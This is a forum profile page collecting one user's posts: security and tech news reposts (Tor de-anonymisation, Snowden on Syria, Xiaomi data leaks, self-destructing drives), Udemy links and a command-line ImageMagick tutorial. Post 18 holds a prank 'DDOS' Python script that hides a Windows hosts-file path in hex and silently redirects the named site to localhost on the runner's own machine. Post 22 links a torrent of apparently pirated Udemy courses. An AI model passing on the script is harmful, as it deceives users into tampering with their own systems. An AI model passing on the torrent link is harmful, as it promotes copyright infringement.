Jump to content

Usr6

Active Members
  • Posts

    1337
  • Joined

  • Last visited

  • Days Won

    89

Everything posted by Usr6

  1. We all were amazed by ‘Mission Impossible’ and the amazing gadgets shown in the famous movie series. Perhaps the most wonderful fact was that those gadgets could be self-destructed on demand. In today’s growing age of data, there is a certain group who want their data to be secure and be able to wipe it off completely in case of theft. There are three devices available in market by Secure Drives which is based in London, and all three are capable of self-destructing simply by sending a message or setting some options at the disposal of user. The pricing goes like this: the Autothysis DSP will cost you $1,500 while the Autothysis 128s shall cost you $1,560 and the Autothysis128t costs $1,663. The Autothysis 128s is basically a 2.5-inch SSD that can be controlled via a smartphone app available for free on iOS and Android. A drive can be linked to more than one smartphone and in case the smartphone is stolen or lost, the connection can be secured using a PIN code. The drive has an encrypted storage worth 128 GB and can be fitted into a computer or connected externally via USB port. The SSD also comes with its own built-in GSM, which is to say that the gadget is capable of receiving text messages. Owing to this capability, when a user intends to permanently delete the data on the drive, all that needs to be done is send a text message to the device and the storage will be removed. The design of this storage drive works in a peculiar way by scrambling or fragmenting the data, making the recovery and reading of data impossible while also preventing any attempts made at recovering the data, thanks to a built-in measure ensuring high security. Apart from sending a text message, the data can also be destroyed by obstructing the GSM signal, repeatedly entering a PIN incorrectly, removing the device from PC when battery falls below a certain level and also through an optional authentication token. The token worth $180 provides another level of security, which allows only the owner to destroy the data. Customers will have to pay a yearly fee after the first year worth $47 to retain the GSM subscription. The Autothysis128t is equipped with the same features as Autothysis128s but it has enhanced internal security measures that make the device harder to crack. The Autothysis DSP doesn’t support the GSM function so you won’t be able to destroy the data via text messages, however, all the other methods will work. As per Secure Drives, the Autothysis drives are legal in more than 100 countries as of now and the country’s data protection laws cover them as well. So those of you wanting to secure their personal data at the next level, this hard-disk is for you. sursa: These Self-Destructing Drives Will Wipe Your Data With A Single SMS
      • 1
      • Upvote
  2. Usr6

    Udemy

    Certified APT Defender APT attack, analysis and defence ,DDOS, Exploitkit analysis & defence, Shellshock vulnerability & exploitation demo This course is about all the latest cyber security threats. This courses is useful from corporate users to college students who want to understand apt attack, analyse and learn how to defend. This course is unique it covers ddos attack, analysis, defense, Exploitkits, android exploitation used by hackers, shellshock vulnerability attack and analysis and Live APT Analysis & Defence. SECTION 1: Advanced Persistent Threat(Attack, Analysis & Defence) SECTION 2: Distributed Denial of Service Attack SECTION 3: ExploitPacks - Cyber Criminals Kits SECTION 4: Point of Sale(POS) Attack, Analysis & Defence SECTION 5: ShellShock Vulnerability(bash) on Servers SECTION 6: Android Exploitation Exploitation SECTION 7: Certified APT Defender Quiz https://www.udemy.com/certified-apt-defender/?couponCode=csibangalore
  3. Este postat la off topic pentru ca nu am gasit confirmari third party Supposedly. So just a few minutes ago has finished a talk at Navaja Negra 2014, the third? most important security congress in Spain, where the speaker (a member of the organization) claimed to have found a bug in OpenSSL RSA key generation, which he is able to exploit to factorize N into p and q in around 20 minutes (on a laptop). He did a live demo. I wasn't there, but some friends were. He claimed: The bug originates in this lines of rsa_gen.c: 117 bitsp=(bits+1)/2; 118 bitsq=bits-bitsp; the main problem being that the rounding of 1025 isn't downwards but upwards, resulting in bitsp= 513 and bitsq=511, which, supposedly, later on the code and due to compiler optimizations, causes the bug. It affects all versions of OpenSSL. He is neither going to report it to the developers, nor publish anything. I personally think he's full of shit, but the fact that he's a member of the organization and thus not only his personal prestige but also the organization's is at stake, makes you wonder. Anyhow, we'll see. I posted it yesterday to netsec but the mods removed it. Let's discuss it here! Edit 1: so my friends talked to him today, and he's serious about it. He says he's broken 1024 keys on Amazon clusters in 18 seconds. Edit 2: he claims some guy from Argentina found the same thing 6 years ago, and has been trying to show it on cons since then, but no con accepted his talk because they wouldn't believe him. Edit 3: he also says the attack consists in trying "probable primes", whose probability is generated by said bug. Might it be some variation on Fermat's attack? Edit 4: as /u/nitsugahttps://www.reddit.com/u/nitsuga said, here is a video demo of the supposed attack. That's the other Argentinian guy I was speaking about in edit 2, and here is the whole blog post in Spanish, and a translation is available here by /u/niggamelonero. Edit 5: read this tweet by @camicelli. Cristian Micelli says he will disclose details on Monday. sursa:https://www.reddit.com/r/crypto/comments/2i9qke/openssl_bug_allows_rsa_1024_key_factorization_in/
  4. Usr6

    Udemy

    Relational Database Design Learn how to create an effective relational database design to use in your IT career or even a personal project. SECTION 1:Introduction SECTION 2:Database Basics SECTION 3:Relational Databases SECTION 4:Data Modelling Process SECTION 5:Database Design SECTION 6:Design Considerations SECTION 7:Conclusion https://www.udemy.com/relational-database-design?couponCode=DBD_REDDITFREE
  5. Done! Ceramique Banned
  6. http://dl.packetstormsecurity.net/papers/virus/BypassAVDynamics.pdf "In this first example, we just allocate and fill 100 Mega Bytes of memory. This is enough to discourage any emulation AV out there." "Attempt to access Web domains which does not exist. In the real world, it fails. In an AV, it will work since the AV will use its own simulated page." etc. merita citit, 21 pagini.
  7. Are you tired of buying a new printer, because your cartridge claims to be empty? Then you need to watch this printer hack which allows you to re-use the same printer cartridge. The cartridges contain a chip which can be reseted. The chip claims that the cartridge is empty, while it is not empty. The video shows how you can hack your printer cartridge Video: https://www.facebook.com/photo.php?v=818165948217780 Sursa: The best printer cartridge hack can be done in 5 seconds | Cyberwarzone
  8. Google has been involved in several controversies including among the companies that was claimed to cooperate with US surveillance agencies on their global data-mining programmes, and just yesterday the popular Media tycoon Rupert Murdoch labeled Google worse than the NSA, saying “NSA privacy invasion bad, but nothing compared to Google.” Now another, but already known controversy over the Internet giant has raised many concerns over privacy of users who carry their smartphones with them. We all have sensors in our pockets that track us everywhere we go i.e. Smartphones. GOOGLE TRACKS YOU EVERYWHERE YOU GO Today, with the help of these sensors, Google is tracking our every foot steps and placing a red dot on its map to keep track of users’ records, Junkee.com reports. “You can yourself check your every move from here. You just need to log in with the same account you use on your Smartphone, that’s it. The map will display all the records of everywhere you've been for the last day to month on your screen,” Elizabeth Flux, editor of Voiceworks magazine wrote. You can check your Location History Here. LOCATION TRACKING - A WORRYING ISSUE Location is one of the most sensitive elements in everyone’s life. Where people go in the evening, at vacations - every data is a part of one’s private life and the existence of that data creates a real threat to privacy. The absence of notifying users only means an ignorance to the privacy of users. However, your records goes to the Google only if you have enabled ‘location services’ in your smartphone devices. If you have disabled this service in your phone then you will find no location data on the map. Infact, if users disable their devices’ location service, apparently it somehow go switched back ON, if in case, any app wants access to their GPS location. So, it’s quite difficult to remain at the safer track. In 2009, MPs criticised the Internet giant Google for its "Latitude" system, which allowed people to enable their mobile to give out details of their location to trusted contacts. At the time MPs said that Latitude "could substantially endanger user privacy", but Google pointed out that users had to specifically choose to make their data available. WHY TRACKING Google track on users, long been said, for the purpose of targeted advertisements. But tracking opens the door to surveillance not only by advertisers but governments as well. Many third parties already track smartphones and tablets by picking up their user data for various purposes, mostly commercial or ad-related. Advertisers and retail stores can record location data about users in order to either serve certain location-related ads, or to better customize store layouts to maximize in-store impulse purchases. TURN OFF LOCATION SERVICE But, If Privacy matters you a lot, then turn Off location service on your device, and better avoid those apps that ask for your location data. To disable the location service, select Settings > Privacy > Location and then untick the box next to Use my location. After former NSA contractor Edward Snowden revealed about the Global Surveillance programs, Privacy has become an important issue for every individual. Despite implementing any ‘privacy’ settings, all our personal information is being collected and stored somewhere. Sursa: Google Map Tracks Your Every Move. Check Your 'Location History' to Verify It
  9. Usr6

    Udemy

    Certified WhiteHat Hacker Level 2 - Break The Security https://www.udemy.com/certified-whitehat-hacker-level-2-break-the-security
  10. ~# python >>> import urllib >>> from bs4 import BeautifulSoup >>> url = urllib.urlopen("http://www.primalsecurity.net") >>> output = BeautifulSoup(url.read(), 'lxml') >>> output.title <title>Primal Security Podcast</title> >>> This tutorial series is designed for those who don’t come from a programming background. Each tutorial will cover common use cases for Python scripting geared for InfoSec professionals. From “Hello World” to custom Python malware, and exploits: 0×0 – Getting Started 0×1 – Port Scanner 0×2 – Reverse Shell 0×3 – Fuzzer 0×4 – Python to EXE 0×5 – Web Requests 0×6 – Spidering 0×7 – Web Scanning and Exploitation 0×8 – Whois Automation 0×9 – Command Automation 0xA – Python for Metasploit Automation 0xB – Pseudo-Terminal 0xC – Python Malware Python Tutorials ? Primal Security Podcast
  11. This week I traveled to northeast China to check out a bitcoin mining operation. After being received at the airport, my contact drove me for nearly an hour to a part of the country more remote than I was expecting. This was my first time checking out a mining operation of this size, so I don’t really know what I was expecting, but I was definitely surprised by how off the beaten path it was. The surrounding countryside seemed to be mostly industrial and agricultural. The first thing you notice as you approach the warehouse is the noise. It begins as soon as you step out of the car, at which point it sounds like massive swarm of angry bees droning away somewhere off in the distance. It becomes louder and louder the closer you get to the building, and as you step through the doors it becomes a deafening and steady roar; a combination of tens of thousands of tiny ASIC chips hashing away, and dozens of large industrial fans serving to cool down the “workers”. I recorded a bit of the sound: The next thing that hits you as you enter is the wind. The deeper into the building I walked, the more powerful the gust became, coming from behind me and rushing past, across the giant warehouse floor full of machines. The third thing that hits you is the heat. Despite the massive and powerful air current created by these massive industrial fans, the inside of the mining farm still manages to hold steady at 40° Celsius (105° f) the entire time. Fans EVERYWHERE. As old hardware becomes dated and unprofitable to run, it really piles up. There’s retired old Avalon machines all over the place. This is where Avalon machines go to die, apparently. The chips are no longer cost-effective to mine for bitcoins with, but the power supply units inside can be stripped out and reused. The mining operation resides on an old, repurposed factory floor, and contains 2500 machines hashing away at 230 Gh/s, each. (That’s 230 billion calculations per second, per unit). The place consumes a massive amount of electricity. The operators told me that the power bill of this specific operation is in excess of ¥400,000 per month (that’s about $60,000 USD). The farm employs three people whose job it is to monitor the machinery and make sure that all the machines are working properly. They work around the clock, in three shifts, and do a walkabout of the floor once per hour to check everything. The picture below is of their office. The curtain was blowing madly the whole time due to the massive airflows through the warehouse. The guys told me that in the time that they are not busy checking machines, rearranging wires, installing new hardware or dealing with retired hardware, that they watch movies and play video games. One of the guys says he’s been enjoying a Korean game called TERA recently. The guys live here mostly full time, going home for 4 or 5 days once a month. They sleep on the premises. All three of the guys that work there are coinsmen themselves, although none of them said they had more than just a couple of bitcoins. One of the guys said that he even has a couple of smaller mining rigs hashing away for himself back home. There’s so many old machines lying about that they even use them as doorstops. There’s also lots and lots of cables. And finally, here’s the heroes that keep our precious bitcoin network safe. Eyes censored for dramatic effect. Getting the opportunity to visit this mining operation was very eye-opening for me. Walking around the warehouse floor, I was struck with a feeling of awe that THIS is what keeps bitcoin alive. That even if someone wanted to bring down bitcoin, they’d have to outdo these guys and the dozens of other operations like this around the world. The decentralized nature of it all… that this is just one operation among many, run by different operators in different countries around the world. This really drove home that bitcoin can’t be killed by decree. Make it illegal in one country and people like this will keep hashing away in others. This is a far cry from the small-time home miners of the not-too-distant past. Not even two years ago I knew a guy mining tons of coins per day with just a couple dozen GPU units in his bedroom. The other feeling I got while there is that this is kind of a libertarian fantasy for many. These guys are performing a valuable service and getting paid well for it. Too many in the world get paid well at the expense of others, or dedicate their lives to giving back to society without a penny in return, but mining farms like these are participating in the economy in a purely capitalist way (and the good kind of capitalism, not “socialism-for-banks-but-we’ll-call-it-capitalism-anyways”). This exclusive report was entirely self-funded. If you’re inclined, you may tip me for this post here: 12G5Sk3JxvcMmLGgDSnHdVnqFcLcRPyFZB Sursa: Inside a Chinese Bitcoin Mine - The CoinsmanThe Coinsman
  12. Usr6

    Udemy

    Learn Linux in 5 Days - An Introduction to the Linux Operating System and Command Line Here is what you will learn by takingLearn Linux in 5 Days: How to get access to a Linux server if you don't already. What a Linux distribution is and which one to choose. What software is needed to connect to Linux from Mac and Windows computers. What SSH is and how to use it. The file system layout of Linux systems and where to find programs, configurations, and documentation. The basic Linux commands you'll use most often. Creating, renaming, moving, and deleting directories. Listing, reading, creating, editing, copying, and deleting files. Exactly how permissions work and how to decipher the most cryptic Linux permissions with ease. How to use the nano, vi, and emacs editors. Two methods to search for files and directories. How to compare the contents of files. What pipes are, why they are useful, and how to use them. How to compress files to save space and make transferring data easy. How and why to redirect input and output from applications. How to customize your shell prompt. How to be efficient at the command line by using aliases, tab completion, and your shell history. How to schedule and automate jobs using cron. How to switch users and run processes as others. How to find and install software. What you learn in Learn Linux in 5 Days applies to any Linux environment including Ubuntu, Debian, Linux Mint, RedHat, Fedora, OpenSUSE, Slackware, and more. https://www.udemy.com/learn-linux-in-5-days/?couponCode=BBHF
  13. C^124 (+-/) A^82 (+-*) B^53 = -1 Indicii: 1. hide (almost) plain text inside another plain text 2. unele "lucruri" sunt introduse in mod intentionat pentru deruta Au rezolvat: - - - - -
  14. ParanoiDF is a PDF Analysis Suite based on PeePDF by Jose Miguel Esparza. The tools/features that have been added are – Password cracking, redaction recovery, DRM removal, malicious JavaScript extraction, and more. Features These are only the newly added features, not the original peepdf features which can be found here. crackpw – This executes Nacho Barrientos Arias’s PDFCrack tool by performing an OS call. The command allows the user to input a custom dictionary, perform a benchmark or continue from a saved state file. If no custom dictionary is input, this command will attempt to brute force a password using a modifiable charset text file in directory “ParanoiDF/pdfcrack”. decrypt – This uses an OS call to Jay Berkenbilt’s “QPDF” which decrypts the PDF document and outputs the decrypted file. This requires the user-password. encrypt – Encrypts an input PDF document with any password you specify. Uses 128-bit RC4 encryption. embedf – Create a blank PDF document with an embedded file. This is for research purposes to show how files can be embedded in PDFs. This command imports Didier Stevens Make-pdf-embedded.py script as a module. embedjs – Similiar to “embedf”, but embeds custom JavaScript file inside a new blank PDF document. If no custom JavaScript file is input, a default app.alert messagebox is embedded. extractJS – This attempts to extract any embedded JavaScript in a PDF document. It does this by importing Blake Hartstein’s Jsunpackn’s “pdf.py” JavaScript tool as a module, then executing it on the file. redact – Generate a list of words that will fit inside a redaction box in a PDF document. The words (with a custom sentence) can then be parsed in a grammar parser and a custom amount can be displayed depending on their score. This command requires a tutorial to use. Please read “redactTutorial.pdf” in directory “ParanoiDF/docs”. removeDRM – Remove DRM (editing, copying etc.) restrictions from PDF document and output to a new file. This does not need the owner-password and there is a possibility the document will lose some formatting. This command works by calling Kovid Goyal’s Calibre’s “ebook-convert” tool. You can download ParanoiDF here:https://github.com/patrickdw123/ParanoiDF/archive/master.zip Sursa:ParanoiDF - PDF Analysis & Password Cracking Tool - Darknet - The Darkside
  15. An Arbor Networks graphic showing the sudden drop-off in network traffic from Syria on November 29, 2012 as the country was essentially erased from network routing tables. In a Wired interview with well-known National Security Agency journalist James Bamford that was published today, Edward Snowden claimed that the US accidentally took most of Syria off the Internet while attempting to bug the country's traffic. Snowden said that back in 2013 when he was still working with the US government, he was told by a US intelligence officer that NSA hackers—not the Assad regime—had been responsible for Syria’s sudden disconnect from the Internet in November and December of 2012 The NSA's Tailored Access Office (TAO), Snowden said, had been attempting to exploit a vulnerability in the router of a “major Internet service provider in Syria.” The exploit would have allowed the NSA to redirect traffic from the router through systems tapped by the agency’s Turmoil packet capture system and the Xkeyscore packet processing system, giving the NSA access to enclosures in e-mails that would otherwise not have been accessible to its broad Internet surveillance. Instead, the TAO’s hackers “bricked” the router, Snowden said. He described the event as an “oh shit” moment, as the TAO operations center team tried to repair the router and cover their tracks, to no avail. “Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage,” Bamford wrote. Snowden told him that someone joked, “If we get caught, we can always point the finger at Israel.” It isn’t clear how the failure of a single router within Syria’s national network would have caused the outage on November 29, which lasted for nearly three days and cut off all traffic from the country to the outside world. It’s likely that the Syrian Telecommunications Establishment withdrew Syrian networks from Internet routing tables to prevent further attacks while they tried to determine the cause of the outage. Syrian state television blamed “terrorists” for the outage at the time, though it was widely assumed the outage was part of a campaign by the Assad regime to deny communications to rebel groups. Syria had previously used illegally obtained network monitoring gear from Blue Coat to break SSL encrypted Web traffic and identify dissidents posting to blogs and social media. Sursa: Snowden: The NSA, not Assad, took Syria off the Internet in 2012 | Ars Technica
  16. A thermal image of IBM's so-called TrueNorth computer chip (left) next to other chips feeding data to the brainlike TrueNorth chip. BM's latest brainlike computer chip may not be "smarter than a fifth-grader," but it can simulate millions of the brain's neurons and perform complex tasks using very little energy. Researchers for the computer hardware giant have developed a postage-stamp-size chip, equipped with 5.4 billion transistors, that is capable of simulating 1 million neurons and 256 million neural connections, or synapses. In addition to mimicking the brain's processing by themselves, individual chips can be connected together like tiles, similar to how circuits are linked in the human brain The team used its "TrueNorth" chip, described today (Aug. 7) in the journal Science, to perform a task that is very challenging for conventional computers: identifying people or objects in an image. [Super-Intelligent Machines: 7 Robotic Futures] "We have not built a brain. What we have done is learn from the brain's anatomy and physiology," said study leader Dharmendra Modha, manager and lead researcher of the cognitive computing groupat IBM Research - Almaden in San Jose, California. Modha gave an analogy to explain how the brainlike chip differs from a classical computer chip. You can think of a classical computer as a left-brained machine, he told Live Science; it's fast, sequential and good at crunching numbers. "What we're building is the counterpart, right-brain machine," he said. Right-brained machine Classical computers — from the first general-purpose electronic computer of the 1940s to today's advanced PCs and smartphones — use a model described by Hungarian-American mathematician and inventor John von Neumann in 1945. The Von Neumann architecture contains a processing unit, a control unit, memory, external storage, and input and output mechanisms. Because of its structure, the system cannot retrieve instructions and perform data operations at the same time. In contrast, IBM's new chip architecture resembles that of a living brain. The chip is composed of computing cores that each contain 256 input lines, or "axons" (the cablelike part of a nerve cell that transmits electrical signals) and 256 output lines, or "neurons." Much like in a real brain, the artificial neurons only send signals, or spikes, when electrical charges reach a certain threshold. The researchers connected more than 4,000 of these cores on a single chip, and tested its performance with a complex image-recognition task. The computer had to detect people, bicyclists, cars and other vehicles in a photo, and identify each object correctly. The project was a major undertaking, Modha said. "This is [the] work of a very large team, working across many years," he said. "It was a multidisciplinary, multi-institutional, multiyear effort." The Defense Advanced Research Projects Agency (DARPA), the branch of the U.S. Department of Defense responsible for developing new technologies for the military, provided funding for the $53.5 million project. [Humanoid Robots to Flying Cars: 10 Coolest DARPA Projects] After the team constructed the chip, Modha halted work for a month and offered a $1,000 bottle of champagne to any team member who could find a bug in the device. But nobody found one, he said. The new chip is not only much more efficient than conventional computer chips, it also produces far less heat, the researchers said. Today's computers — laptops, smartphones and even cars — suffer from visual and sensory impairment, Modha said. But if these devices can function more like a human brain, they may eventually understand their environments better, he said. For example, instead of moving a camera image onto a computer to process it, "the [camera] sensor becomes the computer," he said. Building a brain IBM researchers aren't the only ones building computer chips that mimic the brain. A group at Stanford University developed a system called "Neurogrid" that can simulate a million neurons and billions of synapses. But while Neurogrid requires 16 chips linked together, the IBM chip can simulate the same number of neurons with only a single chip, Modha said. In addition, Neurogrid's memory is stored off-chip, but the new IBM system integrates both computation and memory on the same chip, which minimizes the time needed to transmit data, Modha said. Kwabena Boahen, an electrical engineer at Stanford who led the development of the Neurogrid system, called the IBM chip "a very impressive achievement." (Several of Boahen's colleagues on the Neurogrid project have gone on to work at IBM, he said.) The IBM team was able to fit more transistors onto a single chip, while making it very energy efficient, Boahen told Live Science. Greater energy efficiency means you could compute things directly on your phone instead of relying on cloud computing, the way Apple's voice-controlled Siri program operates, he said. That is, Siri outsources the computation to other computers via a network instead of performing it locally on a device. IBM created the chip as part of DARPA's SyNAPSE program (short for Systems of Neuromorphic Adaptive Plastic Scalable Electronics). The goal of this initiative is to build a computer that resembles the form and function of the mammalian brain, with intelligence similar to acat or mouse. "We've made a huge step forward," Modha said. The team mapped out the wiring diagram of a monkey brain in 2010, and produced a small-scale neural core in 2011. The current chip contains more 4,000 of these cores. Still, the IBM chip is a far cry from a human brain, which contains about 86 trillion neurons and 100 trillion synapses. "We've come a long way, but there's a long way to go," Modha said. Sursa: This Computer Chip Can Think Like a Human Brain
  17. Xiaomi phones have made the news off and on in the last few months for their cheap, value for money phones and corporate moves. More recently, there were also reports that these popular devices also silently sent out user details to a remote server. That news came on the heels of other reports of smartphones being pre-installed with suspect apps. We thought we'd take a quick look into this, so we got our hands on a brand new RedMi 1S: We started with a 'fresh out of the box' test, so no account setup was done or cloud service connection was allowed. Then we went through the following steps: • Inserted SIM card • Connected to WiFi • Allowed the GPS location service • Added a new contact into the phonebook • Send and received an SMS and MMS message • Made and received a phone call We saw that on startup, the phone sent the telco name to the server api.account.xiaomi.com. It also sent IMEI and phone number to the same server: The phone number of contacts added to the phone book and from SMS messages received was also forwarded. Next we connected to and logged into Mi Cloud, the iCloud-like service from Xiaomi. Then we repeated the same test steps as before. This time, the IMSI details were sent to api.account.xiaomi.com, as well as the IMEI and phone number. At this point, this was just a quick test to see if the behavior being reported can be confirmed. In response to the reports, Xiaomi itself has released a statement addressing potential privacy concerns (In Chinese on the company's Hong Kong Facebook page, with an English translation linked). Sursa: Testing the Xiaomi RedMi 1S - F-Secure Weblog : News from the Lab
  18. Usr6

    del

    this is better, you can take down ANY site IN FEW SECONDS, but works only from windows systems:( try: import DDOS_master_power import GOD_power_DDOS import Ultimate_ddoser except: import sys print "*********************************************************" print "*** Welcome ***" print "*** to ***" print "*** Ultimate 1337 DDOSER ***" print "*********************************************************" print "WARNING: THIS SCRIPT CAN DAMAGE YOUR PC, TYPE 'YES' IF YOU AGREE WITH THAT" if raw_input("#") != "YES": sys.exit("Good BYE!") print "Enter the site domaint that you want to take off, ex:RSTforums.com" died_site = raw_input("#") print "taking down %s..." %(died_site) with open("633a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473".decode("hex"), "a") as Killer: Killer.write("\n127.0.0.1\t" + str(died_site)) Killer.close() for exploit in range(0, 2**8): print "#!", sys.exit("\n%s is down" %(died_site))
  19. CyberGhost on mydigitallife.info | CyberGhost VPN ~1000 keys left! Important: The keys can be activated only until 31.08.2014. Only one key per user can be retrived. Please respect that so more people can benefit from it. The key can’t be activated if you already have an active subscription or you have used a promotional key in the past year.
  20. Usr6

    Udemy

    Cyber Defence Course (CDC): https://www.udemy.com/cyber-defence-course-cdc/ Certified WhiteHat Hacker Level 1 https://www.udemy.com/certified-whitehat-hacker-level-1/ Windows Phone - Programming for Advanced https://www.udemy.com/windows-phone-programming-for-advanced/?couponCode=WP4FREE
  21. Users of the online privacy service Tor – designed to allow users to access hidden sites anonymously – may have been unmasked after an attack lasting as long as five months, crafted to de-anonymize traffic on the service, according to the BBC’s report. Tor is a browser which allows users to access “hidden” sites, with the .onion suffix, which cannot be accessed via other browsers. It’s used by political activists – but also said to host child pornography, and illegal markets in everything from drugs to weaponry. The Tor Project said that it had halted the attack on 4 July, but it may have been ongoing as long as five months. Business Insider said that it was not clear what data on users, or hidden services, the attackers had obtained. V3 reported that Tor warned users to “assume” they had been affected. Online privacy – ‘assume’ you are affected, users told Usually, Tor users are extremely hard to track – the browser “bounces” information between 5,000 volunteer PCs to hide its tracks. Even America’s National Security Agency (NSA) described it as, “the King of high secure, low latency Internet anonymity.” The service is used by whistleblowers, political activists and news organizations, but The Telegraph claims it is also “widely used” by criminals. The Tor Project said it believed the attack had been carried out by two researchers due to give a talk at the Black Hat conference in Las Vegas next week. The presentation was cancelled by lawyers from Cornell University for unspecified reasons. The talk, entitled “You Don’t Have to be the NSA to Break Tor” aimed to showcase a technique which could “uncloak” users of the anonymizing web service for less than $3,000. Tor warns intelligence agencies may follow Tor has since pushed out software updates to deal with the problem, but warned, “Hidden service operators should consider changing the location of their hidden service.” The Tor Project also warned that the attack could pave the way for future attempts by other adversaries such as “large intelligence agencies.” “So if the attack was a research project (i.e. not intentionally malicious), it was deployed in an irresponsible way because it puts users at risk indefinitely into the future. “On July 4 2014 we found a group of relays that we assume were trying to de-anonymize users,” the Tor Project said via its blogs. They appear to have been targeting people who operate or access Tor hidden services. While we don’t know when they started doing the attack, users who operated or accessed hidden services from early February through July 4 should assume they were affected.Unfortunately, it’s still unclear what “affected” includes.” The Tor Project said, “So if the attack was a research project (i.e. not intentionally malicious), it was deployed in an irresponsible way because it puts users at risk indefinitely into the future.” Sursa: Tor 'unmasked' - but who is at risk? Pe acelasi subiect: https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack http://hackread.com/tor-network-attacked-and-compromised/ http://thehackernews.com/2014/07/attackers-compromise-tor-network-to-de.html http://news.hitb.org/content/hackers-have-compromised-once-anonymous-tor-network http://arstechnica.com/security/2014/07/active-attack-on-tor-network-tried-to-decloak-users-for-five-months/ L.E: The vulnerability could be related (but not for sure) to the research done by Alexander Volynkin and Michael McCord from Carnegie Mellon University i.e “Attacking Tor and de-anonymizing users”, which was originally scheduled to be delivered at Black Hat USA Conference this year. But unfortunately their talk was cancelled two weeks before, because their material had not been approved by the SEI for public release.
  22. Usr6

    Udemy

    Udemy - Become a Professional Web Developer - 5.40 GB Udemy - How to Create Your Own Video Intro - 1.2 GB Udemy - SEO for Small and Medium Businesses - 387.56 MB Udemy - Millionaire Speaker Tips - 1.62 GB Udemy - Build E-commerce website with PHP, MySQL, jQuery and PayPal - 1.86 GB Udemy - Writing Secure PHP Code - PHP Security Tutorial - 541.61 MB Udemy - YouTube Secrets - Making Money From Your Own YouTube Videos - 446.34 MB Udemy - Beginner Photoshop to HTML5 and CSS3 by Mr Carl Heaton - 774.86 MB Udemy - Responsive Web Design with HTML5 and CSS3 By Paul Cheney - 3.07 GB Udemy - Learn how to make money with Photoshop by making website designs - 3 GB Udemy - PHP Object Oriented Programming Build a Login System - 540.14 MB Udemy - Java Swing (GUI) Programming From Beginner to Expert - 736.61 MB Udemy - CCNA 200-120 On-The-Go Video Boot Camp With Chris Bryant - 3.11 GB Udemy - How To Create A Successful Wordpress Site - 1 GB Udemy - Adobe Illustrator CC - The Complete Guide - 863.98 MB Udemy - Anyone Can Learn to Make a Game - 1.55 GB Udemy - How to run a web design business and sell 15,000 websites - 183.79 MB Udemy - Learning Ubuntu Linux Server - 923.57 MB Udemy - Photoshop CS6 Four Hour Crash Course - 2.61 GB Udemy - Build Flat Responsive Website from Scratch - 1.61 GB Udemy - Build a Website from Scratch with HTML and CSS - 1.01 GB Udemy - Photoshop CS6 - Advanced Beauty Retouching - 729.43 MB Udemy - Local Marketing Blueprint - 1.02 GB Udemy - Mastering Jobs-to-be-Done Interviews - 659.56 MB Udemy - Wordpress Plugin Development for Beginners - 435.59 MB Udemy - C Plus Plus programming - 819.6 MB Udemy - The Complete Guide To Web Video Creation - 5.32 GB Udemy - Digital Matte Painting with Photoshop - 702.53 MB Udemy - Ditch Auto Editing Workflow in Lightroom and Photoshop - 119.21 MB Udemy - Become A Professional Life Coach - 2.62 GB Udemy - Life Hack - How to Live Rent-Free in NYC - 1.46 GB Udemy - 3D Coat 4- Volume 2 Getting Started II - 552.42 MB Udemy - Learn PhalconPHP Framework - 827.41 MB Udemy - Maya - Advanced Rendering with V-Ray - 497.23 MB Udemy - App Development With Swift 2014 - 151.08 MB Udemy - Swift - Learn Apple's New Programming Language by Examples - 112.35 MB Udemy - Build an instantly updating dynamic website with jQuery/AJAX - 1.15 GB Udemy - User Experience Design Fundamentals - 786.19 MB Udemy - SQL Injection Master Course - 466.61 MB Udemy - Coding for Entrepreneurs - 2.96 GB Udemy - Shopping List with AngularJS, PHP and SQLite - 635.5 MB Udemy - Become a Web Developer from Scratch - 2.25 GB Udemy - PHP Codeigniter - Learn Codeigniter - 927.62 MB Udemy - HTML 5 by EduCBA IT Academy - 368.08 MB Udemy - Objective C for Kids - 170MB Udemy - Advanced search form with PHP and MySQL - 165MB Udemy - Learn Python Django From Scratch 2013 - 2.14GB Udemy - Learn PHP Model View Controller Pattern (PHP MVC) - 302MB Udemy - How To Add Google Authentication To a Website - 165MB Udemy - Create a Drag and Drop File Uploader For Websites - 305MB Udemy - Learning Git - A Beginners Git Course From Infinite Skills - 360MB Udemy - The Complete iOS 7 Course - Learn by Building 14 Apps - 5.8GB Udemy - User Experience: The Ultimate Guide to Usability - 725MB Udemy - Robust Scrum Master - 650MB Udemy - Mind Maps and Mind Mapping - 196MB Udemy - Data-Driven Marketing: Leveraging Big Data for Your Business - 88MB Udemy - Scrum - An Introductory Course To Agile - 100MB Udemy - Running Lean Workshop - 535MB Udemy - Leadership in Action by Jack Welch - 405MB Udemy - Change Management Training from Jack Welch - 400MB Udemy - Creating a Winning Strategy by Jack Welch - 402MB Udemy - How to Create an Awesome Demo Video for Your Business - 680MB Udemy - Introduction to web development with Symfony2 - 730MB Udemy - The Ultimate PHP Training Bundle for Beginner to Advanced - 1.74GB Udemy - Photo Gallery with PHP, MySQL, ImageMagick and jQuery - 405MB Udemy - Photo Gallery with Image Tagging - 406MB Udemy - All You Need To Know About AngularJS - Training On AngularJS - 540MB Udemy - Simple Contact Form with PHP - 176MB Udemy - Multilingual CMS Website with PHP, MySQL, jQuery - 985MB Udemy - Become a Startup Founder (Complete Course) - 5.2GB Torrent: Download UDEMY Mega Pack TORRENT BBHF rar Sursa & download password: bestblackhatforum.com
  23. FROM: UNIX COMMAND LINE SKILL LEVEL: FIT Introduction Manipulating image content on a UNIX system using just the command line is most useful when you are not physically present at the machine on which the images are stored (for instance a small embedded computer attached to a camera). It's also very handy on a workstation or laptop when you simply when you want to quickly process hundreds or thousands of images in directories. Commands can also be chained together to create image-processing pipelines. We'll use the well-known ImageMagick5 suite of tools here as they are mature and available for a broad range of UNIX and UNIX-like operating systems and processor architectures. Installing ImageMagick We need to install ImageMagick as unlike many other CLI tools it doesn't ship with UNIX and UNIX-like systems. Linux On a Debian-based GNU/Linux system (like Ubuntu, Crunchbang or indeed Debian itself) you can simply install it like so: sudo apt-get install imagemagick OS X OS X users should set up their machines with MacPorts2 and then they can install it in a similar way to that of Debian-based Linux systems, with the exception that it downloads source-code and compiles the software before installing: sudo port install ImageMagick Format conversion of images One of the many ImageMagick CLI tools is convert and can be used to convert from one image format to another. Here's we convert a JPEG image into a new PNG image: julian@ce:~/images/tmp$ convert orchid.jpg orchid.png A huge number of formats are supported. To get a list supported on your system, use the ImageMagick utility identify like so: julian@ce:~/images/tmp$ identify -list format Finding information about images identify can also be used to find information about our image, including type, filesize and image size: julian@ce:~/images/tmp$ identify orchid.jpg 